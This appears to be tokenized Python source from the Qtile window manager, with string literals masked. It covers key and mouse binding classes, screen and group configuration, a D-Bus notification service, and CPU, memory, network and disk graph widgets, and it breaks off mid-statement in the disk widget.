<s> from . import command <EOL> from . import hook <EOL> from . import utils <EOL> from . import xcbq <EOL> from six import MAXSIZE <EOL> import warnings <EOL> class Key ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , key , * commands , ** kwds ) : <EOL> self . modifiers = modifiers <EOL> self . key = key <EOL> self . commands = commands <EOL> self . desc = kwds . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if key not in xcbq . keysyms : <EOL> raise utils . QtileError ( "<STR_LIT>" % key ) <EOL> self . keysym = xcbq . keysyms [ key ] <EOL> try : <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . key ) <EOL> class Drag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , button , * commands , ** kwargs ) : <EOL> self . start = kwargs . get ( "<STR_LIT:start>" ) <EOL> self . focus = kwargs . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . modifiers = modifiers <EOL> self . button = button <EOL> self . commands = commands <EOL> try : <EOL> self . button_code = int ( self . button . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . button ) <EOL> class Click ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modifiers , button , * commands , ** kwargs ) : <EOL> self . focus = kwargs . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . modifiers = modifiers <EOL> self . button = button <EOL> self . commands = commands <EOL> try : <EOL> self . button_code = int ( self . button . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . modmask = utils . translate_masks ( self . modifiers ) <EOL> except KeyError as v : <EOL> raise utils . QtileError ( v ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . modifiers , self . button ) <EOL> class EzConfig ( object ) : <EOL> """<STR_LIT>""" <EOL> modifier_keys = { <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> } <EOL> def parse ( self , spec ) : <EOL> """<STR_LIT>""" <EOL> mods = [ ] <EOL> keys = [ ] <EOL> for key in spec . split ( '<STR_LIT:->' ) : <EOL> if not key : <EOL> break <EOL> if key in self . modifier_keys : <EOL> if keys : <EOL> msg = '<STR_LIT>' <EOL> raise utils . QtileError ( msg % spec ) <EOL> mods . append ( self . modifier_keys [ key ] ) <EOL> continue <EOL> if len ( key ) == <NUM_LIT:1> : <EOL> keys . append ( key ) <EOL> continue <EOL> if len ( key ) > <NUM_LIT:3> and key [ <NUM_LIT:0> ] == '<STR_LIT:<>' and key [ - <NUM_LIT:1> ] == '<STR_LIT:>>' : <EOL> keys . append ( key [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> continue <EOL> if not keys : <EOL> msg = '<STR_LIT>' <EOL> raise utils . QtileError ( msg % spec ) <EOL> if len ( keys ) > <NUM_LIT:1> : <EOL> msg = '<STR_LIT>' % spec <EOL> raise utils . QtileError ( msg ) <EOL> return mods , keys [ <NUM_LIT:0> ] <EOL> class EzKey ( EzConfig , Key ) : <EOL> def __init__ ( self , keydef , * commands ) : <EOL> modkeys , key = self . parse ( keydef ) <EOL> super ( EzKey , self ) . __init__ ( modkeys , key , * commands ) <EOL> class EzClick ( EzConfig , Click ) : <EOL> def __init__ ( self , btndef , * commands , ** kwargs ) : <EOL> modkeys , button = self . parse ( btndef ) <EOL> button = '<STR_LIT>' % button <EOL> super ( EzClick , self ) . __init__ ( modkeys , button , * commands , ** kwargs ) <EOL> class EzDrag ( EzConfig , Drag ) : <EOL> def __init__ ( self , btndef , * commands , ** kwargs ) : <EOL> modkeys , button = self . parse ( btndef ) <EOL> button = '<STR_LIT>' % button <EOL> super ( EzDrag , self ) . __init__ ( modkeys , button , * commands , ** kwargs ) <EOL> class ScreenRect ( object ) : <EOL> def __init__ ( self , x , y , width , height ) : <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . x , self . y , <EOL> self . width , self . height <EOL> ) <EOL> def hsplit ( self , columnwidth ) : <EOL> assert columnwidth > <NUM_LIT:0> <EOL> assert columnwidth < self . width <EOL> return ( <EOL> self . __class__ ( self . x , self . y , columnwidth , self . height ) , <EOL> self . __class__ ( <EOL> self . x + columnwidth , self . y , <EOL> self . width - columnwidth , self . height <EOL> ) <EOL> ) <EOL> def vsplit ( self , rowheight ) : <EOL> assert rowheight > <NUM_LIT:0> <EOL> assert rowheight < self . height <EOL> return ( <EOL> self . __class__ ( self . x , self . y , self . width , rowheight ) , <EOL> self . __class__ ( <EOL> self . x , self . y + rowheight , <EOL> self . width , self . height - rowheight <EOL> ) <EOL> ) <EOL> class Screen ( command . CommandObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , top = None , bottom = None , left = None , right = None , <EOL> x = None , y = None , width = None , height = None ) : <EOL> self . group = None <EOL> self . previous_group = None <EOL> self . top = top <EOL> self . bottom = bottom <EOL> self . left = left <EOL> self . right = right <EOL> self . qtile = None <EOL> self . index = None <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def _configure ( self , qtile , index , x , y , width , height , group ) : <EOL> self . qtile = qtile <EOL> self . index = index <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> self . setGroup ( group ) <EOL> for i in self . gaps : <EOL> i . _configure ( qtile , self ) <EOL> @ property <EOL> def gaps ( self ) : <EOL> return ( i for i in [ self . top , self . bottom , self . left , self . right ] if i ) <EOL> @ property <EOL> def dx ( self ) : <EOL> return self . x + self . left . size if self . left else self . x <EOL> @ property <EOL> def dy ( self ) : <EOL> return self . y + self . top . size if self . top else self . y <EOL> @ property <EOL> def dwidth ( self ) : <EOL> val = self . width <EOL> if self . left : <EOL> val -= self . left . size <EOL> if self . right : <EOL> val -= self . right . size <EOL> return val <EOL> @ property <EOL> def dheight ( self ) : <EOL> val = self . height <EOL> if self . top : <EOL> val -= self . top . size <EOL> if self . bottom : <EOL> val -= self . bottom . size <EOL> return val <EOL> def get_rect ( self ) : <EOL> return ScreenRect ( self . dx , self . dy , self . dwidth , self . dheight ) <EOL> def setGroup ( self , new_group , save_prev = True ) : <EOL> """<STR_LIT>""" <EOL> if new_group . screen == self : <EOL> return <EOL> if save_prev : <EOL> self . previous_group = self . group <EOL> if new_group is None : <EOL> return <EOL> if new_group . screen : <EOL> g1 = self . group <EOL> s1 = self <EOL> g2 = new_group <EOL> s2 = new_group . screen <EOL> s2 . group = g1 <EOL> g1 . _setScreen ( s2 ) <EOL> s1 . group = g2 <EOL> g2 . _setScreen ( s1 ) <EOL> else : <EOL> old_group = self . group <EOL> self . group = new_group <EOL> new_group . _setScreen ( self ) <EOL> if old_group is not None : <EOL> old_group . _setScreen ( None ) <EOL> hook . fire ( "<STR_LIT>" ) <EOL> hook . fire ( "<STR_LIT>" ) <EOL> hook . fire ( <EOL> "<STR_LIT>" , <EOL> self . group . layouts [ self . group . currentLayout ] , <EOL> self . group <EOL> ) <EOL> def _items ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return ( True , list ( range ( len ( self . group . layouts ) ) ) ) <EOL> elif name == "<STR_LIT>" : <EOL> return ( True , [ i . window . wid for i in self . group . windows ] ) <EOL> elif name == "<STR_LIT:bar>" : <EOL> return ( False , [ x . position for x in self . gaps ] ) <EOL> def _select ( self , name , sel ) : <EOL> if name == "<STR_LIT>" : <EOL> if sel is None : <EOL> return self . group . layout <EOL> else : <EOL> return utils . lget ( self . group . layouts , sel ) <EOL> elif name == "<STR_LIT>" : <EOL> if sel is None : <EOL> return self . group . currentWindow <EOL> else : <EOL> for i in self . group . windows : <EOL> if i . window . wid == sel : <EOL> return i <EOL> elif name == "<STR_LIT:bar>" : <EOL> return getattr ( self , sel ) <EOL> def resize ( self , x = None , y = None , w = None , h = None ) : <EOL> x = x or self . x <EOL> y = y or self . y <EOL> w = w or self . width <EOL> h = h or self . height <EOL> self . _configure ( self . qtile , self . index , x , y , w , h , self . group ) <EOL> for bar in [ self . top , self . bottom , self . left , self . right ] : <EOL> if bar : <EOL> bar . draw ( ) <EOL> self . qtile . call_soon ( self . group . layoutAll ( ) ) <EOL> def cmd_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> index = self . index , <EOL> width = self . width , <EOL> height = self . height , <EOL> x = self . x , <EOL> y = self . y <EOL> ) <EOL> def cmd_resize ( self , x = None , y = None , w = None , h = None ) : <EOL> """<STR_LIT>""" <EOL> self . resize ( x , y , w , h ) <EOL> def cmd_next_group ( self , skip_empty = False , skip_managed = False ) : <EOL> """<STR_LIT>""" <EOL> n = self . group . nextGroup ( skip_empty , skip_managed ) <EOL> self . setGroup ( n ) <EOL> return n . name <EOL> def cmd_prev_group ( self , skip_empty = False , skip_managed = False ) : <EOL> """<STR_LIT>""" <EOL> n = self . group . prevGroup ( skip_empty , skip_managed ) <EOL> self . setGroup ( n ) <EOL> return n . name <EOL> def cmd_toggle_group ( self , group_name = None ) : <EOL> """<STR_LIT>""" <EOL> group = self . qtile . groupMap . get ( group_name ) <EOL> if group in ( self . group , None ) : <EOL> group = self . previous_group <EOL> self . setGroup ( group ) <EOL> def cmd_togglegroup ( self , groupName = None ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> self . cmd_toggle_group ( groupName ) <EOL> class Group ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , matches = None , exclusive = False , <EOL> spawn = None , layout = None , layouts = None , persist = True , init = True , <EOL> layout_opts = None , screen_affinity = None , position = MAXSIZE ) : <EOL> self . name = name <EOL> self . exclusive = exclusive <EOL> self . spawn = spawn <EOL> self . layout = layout <EOL> self . layouts = layouts or [ ] <EOL> self . persist = persist <EOL> self . init = init <EOL> self . matches = matches or [ ] <EOL> self . layout_opts = layout_opts or { } <EOL> self . screen_affinity = screen_affinity <EOL> self . position = position <EOL> def __repr__ ( self ) : <EOL> attrs = utils . describe_attributes ( self , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return '<STR_LIT>' % ( self . name , attrs ) <EOL> class Match ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , title = None , wm_class = None , role = None , wm_type = None , <EOL> wm_instance_class = None , net_wm_pid = None ) : <EOL> if not title : <EOL> title = [ ] <EOL> if not wm_class : <EOL> wm_class = [ ] <EOL> if not role : <EOL> role = [ ] <EOL> if not wm_type : <EOL> wm_type = [ ] <EOL> if not wm_instance_class : <EOL> wm_instance_class = [ ] <EOL> if not net_wm_pid : <EOL> net_wm_pid = [ ] <EOL> try : <EOL> net_wm_pid = list ( map ( int , net_wm_pid ) ) <EOL> except ValueError : <EOL> error = '<STR_LIT>' '<STR_LIT>' % str ( net_wm_pid ) <EOL> raise utils . QtileError ( error ) <EOL> self . _rules = [ ( '<STR_LIT:title>' , t ) for t in title ] <EOL> self . _rules += [ ( '<STR_LIT>' , w ) for w in wm_class ] <EOL> self . _rules += [ ( '<STR_LIT>' , r ) for r in role ] <EOL> self . _rules += [ ( '<STR_LIT>' , r ) for r in wm_type ] <EOL> self . _rules += [ ( '<STR_LIT>' , w ) for w in wm_instance_class ] <EOL> self . _rules += [ ( '<STR_LIT>' , w ) for w in net_wm_pid ] <EOL> def compare ( self , client ) : <EOL> for _type , rule in self . _rules : <EOL> if _type == "<STR_LIT>" : <EOL> def match_func ( value ) : <EOL> return rule == value <EOL> else : <EOL> match_func = getattr ( rule , '<STR_LIT>' , None ) or getattr ( rule , '<STR_LIT:count>' ) <EOL> if _type == '<STR_LIT:title>' : <EOL> value = client . name <EOL> elif _type == '<STR_LIT>' : <EOL> value = None <EOL> _value = client . window . get_wm_class ( ) <EOL> if _value and len ( _value ) > <NUM_LIT:1> : <EOL> value = _value [ <NUM_LIT:1> ] <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_wm_class ( ) <EOL> if value : <EOL> value = value [ <NUM_LIT:0> ] <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_wm_type ( ) <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_net_wm_pid ( ) <EOL> else : <EOL> value = client . window . get_wm_window_role ( ) <EOL> if value and match_func ( value ) : <EOL> return True <EOL> return False <EOL> def map ( self , callback , clients ) : <EOL> """<STR_LIT>""" <EOL> for c in clients : <EOL> if self . compare ( c ) : <EOL> callback ( c ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _rules <EOL> class Rule ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , match , group = None , float = False , intrusive = False , <EOL> break_on_match = True ) : <EOL> self . match = match <EOL> self . group = group <EOL> self . float = float <EOL> self . intrusive = intrusive <EOL> self . break_on_match = break_on_match <EOL> def matches ( self , w ) : <EOL> return self . match . compare ( w ) <EOL> def __repr__ ( self ) : <EOL> actions = utils . describe_attributes ( self , [ '<STR_LIT>' , '<STR_LIT:float>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return '<STR_LIT>' % ( self . match , actions ) </s>
<s> """<STR_LIT>""" <EOL> from . log_utils import logger <EOL> try : <EOL> import dbus <EOL> from dbus import service <EOL> from dbus . mainloop . glib import DBusGMainLoop <EOL> except ImportError : <EOL> dbus = None <EOL> BUS_NAME = '<STR_LIT>' <EOL> SERVICE_PATH = '<STR_LIT>' <EOL> if dbus : <EOL> class NotificationService ( service . Object ) : <EOL> def __init__ ( self , manager ) : <EOL> bus_name = service . BusName ( BUS_NAME , bus = dbus . SessionBus ( ) ) <EOL> service . Object . __init__ ( self , bus_name , SERVICE_PATH ) <EOL> self . manager = manager <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT>' ) <EOL> def GetCapabilities ( self ) : <EOL> return ( '<STR_LIT:body>' ) <EOL> @ service . method ( <EOL> BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT:u>' <EOL> ) <EOL> def Notify ( self , app_name , replaces_id , app_icon , summary , <EOL> body , actions , hints , timeout ) : <EOL> notif = Notification ( summary , body , timeout , hints ) <EOL> return self . manager . add ( notif ) <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT:u>' , out_signature = '<STR_LIT>' ) <EOL> def CloseNotification ( self , id ) : <EOL> pass <EOL> @ service . signal ( BUS_NAME , signature = '<STR_LIT>' ) <EOL> def NotificationClosed ( self , id_in , reason_in ) : <EOL> pass <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT>' ) <EOL> def GetServerInformation ( self ) : <EOL> return ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:1>" ) <EOL> class Notification ( object ) : <EOL> def __init__ ( self , summary , body = '<STR_LIT>' , timeout = - <NUM_LIT:1> , hints = None ) : <EOL> self . summary = summary <EOL> self . hints = hints or { } <EOL> self . body = body <EOL> self . timeout = timeout <EOL> class NotificationManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . notifications = [ ] <EOL> self . callbacks = [ ] <EOL> self . _service = None <EOL> @ property <EOL> def service ( self ) : <EOL> if dbus and self . _service is None : <EOL> try : <EOL> DBusGMainLoop ( set_as_default = True ) <EOL> self . _service = NotificationService ( self ) <EOL> except Exception : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> self . _service = None <EOL> return self . _service <EOL> def register ( self , callback ) : <EOL> if not self . service : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> callback . __name__ , <EOL> ) <EOL> self . callbacks . append ( callback ) <EOL> def add ( self , notif ) : <EOL> self . notifications . append ( notif ) <EOL> notif . id = len ( self . notifications ) <EOL> for callback in self . callbacks : <EOL> callback ( notif ) <EOL> return len ( self . notifications ) <EOL> def show ( self , * args , ** kwargs ) : <EOL> notif = Notification ( * args , ** kwargs ) <EOL> return ( notif , self . add ( notif ) ) <EOL> notifier = NotificationManager ( ) </s>
<s> import cairocffi <EOL> from . import base <EOL> from libqtile . log_utils import logger <EOL> from os import statvfs <EOL> import time <EOL> import platform <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class _Graph ( base . _Widget ) : <EOL> fixed_upper_bound = False <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:2> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:100> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:type>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def __init__ ( self , width = <NUM_LIT:100> , ** config ) : <EOL> base . _Widget . __init__ ( self , width , ** config ) <EOL> self . add_defaults ( _Graph . defaults ) <EOL> self . values = [ <NUM_LIT:0> ] * self . samples <EOL> self . maxvalue = <NUM_LIT:0> <EOL> self . oldtime = time . time ( ) <EOL> self . lag_cycles = <NUM_LIT:0> <EOL> def timer_setup ( self ) : <EOL> self . timeout_add ( self . frequency , self . update ) <EOL> @ property <EOL> def graphwidth ( self ) : <EOL> return self . width - self . border_width * <NUM_LIT:2> - self . margin_x * <NUM_LIT:2> <EOL> @ property <EOL> def graphheight ( self ) : <EOL> return self . bar . height - self . margin_y * <NUM_LIT:2> - self . border_width * <NUM_LIT:2> <EOL> def draw_box ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> for val in values : <EOL> val = self . val ( val ) <EOL> self . drawer . fillrect ( x , y - val , step , val ) <EOL> x += step <EOL> def draw_line ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples - <NUM_LIT:1> ) <EOL> self . drawer . ctx . set_line_join ( cairocffi . LINE_JOIN_ROUND ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> self . drawer . ctx . set_line_width ( self . line_width ) <EOL> for val in values : <EOL> self . drawer . ctx . line_to ( x , y - self . val ( val ) ) <EOL> x += step <EOL> self . drawer . ctx . stroke ( ) <EOL> def draw_linefill ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples - <NUM_LIT:2> ) <EOL> self . drawer . ctx . set_line_join ( cairocffi . LINE_JOIN_ROUND ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> self . drawer . ctx . set_line_width ( self . line_width ) <EOL> for index , val in enumerate ( values ) : <EOL> self . drawer . ctx . line_to ( x + index * step , y - self . val ( val ) ) <EOL> self . drawer . ctx . stroke_preserve ( ) <EOL> self . drawer . ctx . line_to ( <EOL> x + ( len ( values ) - <NUM_LIT:1> ) * step , <EOL> y - <NUM_LIT:1> + self . line_width / <NUM_LIT> <EOL> ) <EOL> self . drawer . ctx . line_to ( x , y - <NUM_LIT:1> + self . line_width / <NUM_LIT> ) <EOL> self . drawer . set_source_rgb ( self . fill_color ) <EOL> self . drawer . ctx . fill ( ) <EOL> def val ( self , val ) : <EOL> if self . start_pos == '<STR_LIT>' : <EOL> return val <EOL> elif self . start_pos == '<STR_LIT>' : <EOL> return - val <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . start_pos ) <EOL> def draw ( self ) : <EOL> self . drawer . clear ( self . background or self . bar . background ) <EOL> if self . border_width : <EOL> self . drawer . set_source_rgb ( self . border_color ) <EOL> self . drawer . ctx . set_line_width ( self . border_width ) <EOL> self . drawer . ctx . rectangle ( <EOL> self . margin_x + self . border_width / <NUM_LIT> , <EOL> self . margin_y + self . border_width / <NUM_LIT> , <EOL> self . graphwidth + self . border_width , <EOL> self . bar . height - self . margin_y * <NUM_LIT:2> - self . border_width , <EOL> ) <EOL> self . drawer . ctx . stroke ( ) <EOL> x = self . margin_x + self . border_width <EOL> y = self . margin_y + self . border_width <EOL> if self . start_pos == '<STR_LIT>' : <EOL> y += self . graphheight <EOL> elif not self . start_pos == '<STR_LIT>' : <EOL> raise ValueError ( "<STR_LIT>" % self . start_pos ) <EOL> k = <NUM_LIT:1.0> / ( self . maxvalue or <NUM_LIT:1> ) <EOL> scaled = [ self . graphheight * val * k for val in reversed ( self . values ) ] <EOL> if self . type == "<STR_LIT>" : <EOL> self . draw_box ( x , y , scaled ) <EOL> elif self . type == "<STR_LIT>" : <EOL> self . draw_line ( x , y , scaled ) <EOL> elif self . type == "<STR_LIT>" : <EOL> self . draw_linefill ( x , y , scaled ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . type ) <EOL> self . drawer . draw ( offsetx = self . offset , width = self . width ) <EOL> def push ( self , value ) : <EOL> if self . lag_cycles > self . samples : <EOL> self . lag_cycles = <NUM_LIT:1> <EOL> self . values = ( [ value ] * min ( self . samples , self . lag_cycles ) ) + self . values <EOL> self . values = self . values [ : self . samples ] <EOL> if not self . fixed_upper_bound : <EOL> self . maxvalue = max ( self . values ) <EOL> self . draw ( ) <EOL> def update ( self ) : <EOL> newtime = time . time ( ) <EOL> self . lag_cycles = int ( ( newtime - self . oldtime ) / self . frequency ) <EOL> self . oldtime = newtime <EOL> self . update_graph ( ) <EOL> self . timeout_add ( self . frequency , self . update ) <EOL> def fulfill ( self , value ) : <EOL> self . values = [ value ] * len ( self . values ) <EOL> class CPUGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT:all>" , "<STR_LIT>" ) , <EOL> ] <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( CPUGraph . defaults ) <EOL> self . maxvalue = <NUM_LIT:100> <EOL> self . oldvalues = self . _getvalues ( ) <EOL> def _getvalues ( self ) : <EOL> proc = '<STR_LIT>' <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> proc = '<STR_LIT>' + proc <EOL> with open ( proc ) as file : <EOL> lines = file . readlines ( ) <EOL> line = lines . pop ( <NUM_LIT:0> ) <EOL> if isinstance ( self . core , int ) : <EOL> line = lines [ self . core ] <EOL> if not line . startswith ( "<STR_LIT>" % self . core ) : <EOL> raise ValueError ( "<STR_LIT>" % self . core ) <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> name , user , nice , sys , idle = line . split ( None , <NUM_LIT:4> ) <EOL> else : <EOL> name , user , nice , sys , idle , iowait , tail = line . split ( None , <NUM_LIT:6> ) <EOL> return ( int ( user ) , int ( nice ) , int ( sys ) , int ( idle ) ) <EOL> def update_graph ( self ) : <EOL> nval = self . _getvalues ( ) <EOL> oval = self . oldvalues <EOL> busy = nval [ <NUM_LIT:0> ] + nval [ <NUM_LIT:1> ] + nval [ <NUM_LIT:2> ] - oval [ <NUM_LIT:0> ] - oval [ <NUM_LIT:1> ] - oval [ <NUM_LIT:2> ] <EOL> total = busy + nval [ <NUM_LIT:3> ] - oval [ <NUM_LIT:3> ] <EOL> if total : <EOL> push_value = busy * <NUM_LIT> / total <EOL> self . push ( push_value ) <EOL> else : <EOL> self . push ( self . values [ <NUM_LIT:0> ] ) <EOL> self . oldvalues = nval <EOL> def get_meminfo ( ) : <EOL> val = { } <EOL> proc = '<STR_LIT>' <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> proc = "<STR_LIT>" + proc <EOL> with open ( proc ) as file : <EOL> for line in file : <EOL> if line . lstrip ( ) . startswith ( "<STR_LIT>" ) : <EOL> pass <EOL> else : <EOL> key , tail = line . strip ( ) . split ( '<STR_LIT::>' ) <EOL> uv = tail . split ( ) <EOL> val [ key ] = int ( uv [ <NUM_LIT:0> ] ) <EOL> val [ '<STR_LIT>' ] = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> return val <EOL> class MemoryGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> val = self . _getvalues ( ) <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> mem = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> self . fulfill ( mem ) <EOL> def _getvalues ( self ) : <EOL> return get_meminfo ( ) <EOL> def update_graph ( self ) : <EOL> val = self . _getvalues ( ) <EOL> self . push ( <EOL> val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> ) <EOL> class SwapGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> val = self . _getvalues ( ) <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> swap = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> self . fulfill ( swap ) <EOL> def _getvalues ( self ) : <EOL> return get_meminfo ( ) <EOL> def update_graph ( self ) : <EOL> val = self . _getvalues ( ) <EOL> swap = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if self . maxvalue != val [ '<STR_LIT>' ] : <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> self . fulfill ( swap ) <EOL> self . push ( swap ) <EOL> class NetGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( NetGraph . defaults ) <EOL> if self . interface == "<STR_LIT>" : <EOL> try : <EOL> self . interface = self . get_main_iface ( ) <EOL> except RuntimeError : <EOL> logger . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . interface = "<STR_LIT>" <EOL> self . filename = '<STR_LIT>' . format ( <EOL> interface = self . interface , <EOL> type = self . bandwidth_type == '<STR_LIT>' and '<STR_LIT>' or '<STR_LIT>' <EOL> ) <EOL> self . bytes = <NUM_LIT:0> <EOL> self . bytes = self . _getValues ( ) <EOL> def _getValues ( self ) : <EOL> try : <EOL> with open ( self . filename ) as file : <EOL> val = int ( file . read ( ) ) <EOL> rval = val - self . bytes <EOL> self . bytes = val <EOL> return rval <EOL> except IOError : <EOL> return <NUM_LIT:0> <EOL> def update_graph ( self ) : <EOL> val = self . _getValues ( ) <EOL> self . push ( val ) <EOL> @ staticmethod <EOL> def get_main_iface ( ) : <EOL> def make_route ( line ) : <EOL> return dict ( zip ( [ '<STR_LIT>' , '<STR_LIT>' ] , line . split ( ) ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as fp : <EOL> lines = fp . readlines ( ) <EOL> routes = [ make_route ( line ) for line in lines [ <NUM_LIT:1> : ] ] <EOL> try : <EOL> return next ( <EOL> ( r for r in routes if not int ( r [ '<STR_LIT>' ] , <NUM_LIT:16> ) ) , <EOL> routes [ <NUM_LIT:0> ] <EOL> ) [ '<STR_LIT>' ] <EOL> except ( KeyError , IndexError , ValueError ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> class HDDGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> fixed_upper_bound = True <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT:path>" , "<STR_LIT:/>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( HDDGraph . defaults ) <EOL> stats = statvfs ( self . path ) <EOL> self . maxvalue = stats . f_blocks * stats . f_frsize <EOL> values = self . _getValues ( ) <EOL> self . fulfill ( values ) <EOL> def _getValues ( self ) : <EOL> stats = statvfs ( self . 